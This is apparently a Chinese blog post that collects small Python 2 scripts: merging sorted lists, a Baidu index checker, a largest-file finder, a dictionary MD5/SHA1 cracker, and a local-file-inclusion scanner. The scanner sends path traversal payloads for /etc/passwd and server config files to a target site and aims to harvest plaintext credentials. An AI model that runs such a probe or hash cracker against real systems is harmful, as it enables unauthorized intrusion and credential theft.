1.有序列表的合并
#!/usr/bin/env python # coding=utf-8 ''' 假设有2个有序列表list_1、list_2,如何效率比较高的将2个list合并并保持有序状态(这里默认排序是正序)? 思路是比较简单的,无非是依次比较list_1和list_2头部第一个元素,将比较小的放在一个新的列表中,以此类推(递归),直到所有的元素都被放到新的列表中。 对于Python而言,即使是尾递归,效率也不是那么高,为了避免爆栈,通常还是会用循环的方法(loop_merge_sort)来做 ''' def recursion_merge_sort1(list_1, list_2): tmp = [] if len(list_1) == 0: tmp.extend(list_2) return tmp elif len(list_2) == 0: tmp.extend(list_1) return tmp else: if list_1[0] < list_2[0]: tmp.append(list_1[0]) del list_1[0] else: tmp.append(list_2[0]) del list_2[0] tmp += recursion_merge_sort1(list_1, list_2) return tmp def recursion_merge_sort2(list_1, list_2, tmp=[]): if len(list_1) == 0 or len(list_2) == 0: tmp.extend(list_1) tmp.extend(list_2) return tmp else: if list_1[0] < list_2[0]: tmp.append(list_1[0]) del list_1[0] else: tmp.append(list_2[0]) del list_2[0] return recursion_merge_sort2(list_1, list_2, tmp) def loop_merge_sort(list_1, list_2): tmp = [] while len(list_1) > 0 and len(list_2) > 0: if list_1[0] < list_2[0]: tmp.append(list_1[0]) del list_1[0] else: tmp.append(list_2[0]) del list_2[0] tmp.extend(list_1) tmp.extend(list_2) return tmp
2.查询Baidu是否收录了某个URL
#!/usr/bin/env python #coding=utf-8 import requests from bs4 import BeautifulSoup as bs import re headers = { 'User-Agent': 'Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+GTB7.1;+.NET+CLR+2.0.50727)' } # 设置UA模拟用户,还可设置多个UA提高搜索成功率 def baidu_url(word): # 构建百度搜索URL;因为是查收录,所以只显示了前10个搜索结果,还可以通过rn参数来调整搜索结果的数量 ''' get baidu search url ''' return 'http://www.baidu.com/s?wd=%s' % word def baidu_cont(url): # 获取百度搜索结果页内容 r = requests.get(url, headers=headers) return r.content def serp_links(word): #获取百度搜索结果的最终URL ''' get baidu serp links with the word [serp - 搜索引擎结果页面(Search Engine Results Page)] ''' b_url = baidu_url(word) soup = bs(baidu_cont(b_url)) b_tags = soup.find_all('h3', {'class': 't'}) # 获取URL的特征值是通过class="t" b_links = [tag.a['href'] for tag in b_tags] real_links = [] for link in b_links: # 使用requests库获取了最终URL,而不是快照URL try: r = requests.get(link, headers=headers, timeout=120) except Exception as e: real_links.append('page404') else: real_links.append(r.url) return real_links def indexer(url): # 待查URL是否在百度搜索结果的URL列表中,如果在就表示收录,反之未收录 indexed_links = serp_links(url) if url in indexed_links: return True else: return False
3.本地暴力破解MD5/SHA1
#!/usr/bin/env python # -*- coding: utf-8 -*- # Filename: py_crackhash.py 穷举字典破解md5/sha1 import sys, getopt, hashlib if len(sys.argv) == 1: print 'Usage: py_crackhash.py -t hashtype{md5/sha1} -h hashcode -w wordfile' sys.exit() opts, args = getopt.getopt(sys.argv[1:], "t:h:w:") hashtype = "" hashcode = "" wordfile = "" for op, value in opts: if op == "-t": hashtype = value elif op == "-h": hashcode = value elif op == "-w": wordfile = value else: sys.exit() w = file(wordfile, 'r') if hashtype == "md5": while True: line = w.readline() if line: y = hashlib.md5(line.rstrip()).hexdigest() if hashcode == y: print "md5(%s)=%s" % (line.rstrip(), y) break else: print 'NULL' break if hashtype == "sha1": while True: line = w.readline() if line: y = hashlib.sha1(line.rstrip()).hexdigest() if hashcode == y: print "sha1(%s)=%s" % (line.rstrip(), y) break else: print 'NULL' break w.close()
4.多线程查找指定目录下的最大的10个文件
#!/usr/bin/env python # coding=utf-8 import os, os.path from ConfigParser import RawConfigParser as rcp from threading import Thread, Lock import sys import time MaxCount=10 def insert(tenmax, filename, filesize): i=0 while i<len(tenmax) and tenmax[i][1]>filesize: i += 1 tenmax.insert(i, [filename, filesize]) def keepTenMax(tenmax, filename, filesize): i=len(tenmax) if i<MaxCount: insert(tenmax, filename, filesize) else: if filesize>tenmax[i-1][1]: insert(tenmax, filename, filesize) tenmax.pop() elif filesize==tenmax[i-1][1]: tenmax.append([filename, filesize]) if len(tenmax)>MaxCount: tenmax=tenmax[:MaxCount] else: return class MyThread(Thread):#多线程搜索 def __init__(self, root, files, tname): Thread.__init__(self) self.root=root self.files=files self.name=tname self.tenmax=[] def run(self): global count for f in self.files: filename=self.root+os.sep+f filesize=os.stat(filename).st_size mylock.acquire() #获得锁 count += 1 mylock.release() #释放锁 keepTenMax(self.tenmax, filename, filesize) def allDone(threadlist): for i in threadlist: if i.isAlive(): return False return True #main if __name__=="__main__": global count #全局文件计数 mylock=Lock() #define a lock count=1 tenmax=[] threadlist=[] if len(sys.argv)==1: wdir='.' elif len(sys.argv)==2: wdir=sys.argv[1] else: print 'Usage: findBigFiles.py [wdir]' sys.exit() tname=1 begin=time.time() for root, dirs, files in os.walk(wdir): if files: sthread=MyThread(root, files, tname)#对每一个目录开启一个线程搜索 threadlist.append(sthread) sthread.start() print 'thread-'+str(tname)+'-start search dir:'+root tname += 1 for t in threadlist: t.join() if allDone(threadlist):#统计结果 for i in threadlist: tenmax.extend(i.tenmax) if len(tenmax)<MaxCount: tenmax=tenmax[:len(tenmax)] else: a=[] for f in tenmax: keepTenMax(a, f[0], f[1]) tenmax=a #打印并输出到parser文件-当前目录下的result.ini文件 print print '[=========================threads count', len(threadlist), '====================]' print '[=========================try', count, 'files=======================]' print '[=========================the ', MaxCount, ' thMax files list===========]' print c=1 myrcp=rcp() myrcp.add_section('Result') for fname, fsize in tenmax: size='%.3fMB' % (fsize/1024.0/1024.0) print '[%d]%s-%s' % (c, fname, size) myrcp.set('Result', '[%d]%s' % (c, fname), size) c += 1 myrcp.write(open('result.txt', 'w')) end=time.time() usetime=end-begin print print '[=============================================================]' print 'all time:%.3fs' % usetime
5.探测本地文件包含漏洞
#!/usr/bin/env python #-*-coding:utf-8-*- import urllib2 import sys var1=0 var2=0 print ("-----------------------------------------------------") print ("| usage:py_detect_LFI.py site url |") print ("|this url like http://www.google.com/index.php?id= |") print (" writed by eip_0x[Freebuf],just 4 fun |") print ("-----------------------------------------------------") site0=sys.argv[1]+'/kfdsjkf7675637d.txt' #访问一个不存在的文件获取返回错误页面的length信息 req0=urllib2.Request(site0) conn0=urllib2.urlopen(req0) while 1: data0=conn0.read(4072) #错误页面的内容 if not len(data0): break paths1=['/etc/passwd','../etc/passwd','../../etc/passwd','../../../etc/passwd','../../../../etc/passwd','../../../../../etc/passwd','../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../../etc/passwd','../../../../../../../../../etc/passwd','../../../../../../../../../../etc/passwd'] paths2=['/usr/local/app/apache2/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/usr/local/app/apache2/conf/extra/httpd-vhosts.conf','/usr/local/app/php5/lib/php.ini','/etc/sysconfig/iptables','/etc/httpd/conf/httpd.conf','/etc/my.cnf','/etc/issue','/etc/redhat-release','/usr/local/apche/conf/httpd.conf','/etc/httpd/conf/httpd.conf'] for path in paths1: #首先查找'/etc/passwd'文件是否存在 site=sys.argv[1]+path req=urllib2.Request(site) conn=urllib2.urlopen(req) while 1: data=conn.read(4072) if not len(data0): break if len(data)!=len(data0): print path," this file has been found!!!!u r lucky and have fun!!!!" for path2 in paths2: #在查找到了'/etc/passwd'文件之后再查找配置文件,希望能从中读取出用户名密码的明文信息 path2ok=path.replace("/etc/passwd",path2) #replace("查找的内容","替换后的内容"[,次数]),替换次数可以为空,即表示替换所有 site2=sys.argv[1]+path2ok req2=urllib2.Request(site2) conn2=urllib2.urlopen(req2) while 1: data2=conn2.read(4072) if not len(data2): break if len(data2)!=len(data0): print path2,"this file has been found!!"
6.待续……
==
这里的很多代码都是在网上逛blog的时候收集而来,在此感谢作者的无私分享(有些代码已经忘了出处了,找到了之后会尽快补上)。
《“一些实用的Python脚本[bak]”》 有 1 条评论
归并排序
http://zjwyhll.blog.163.com/blog/static/75149781201281291048145